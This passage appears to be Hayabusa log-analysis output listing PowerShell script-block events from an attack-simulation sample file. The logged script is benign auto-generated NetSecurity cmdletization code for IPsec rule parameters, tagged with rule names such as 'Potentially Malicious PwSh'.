[object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = 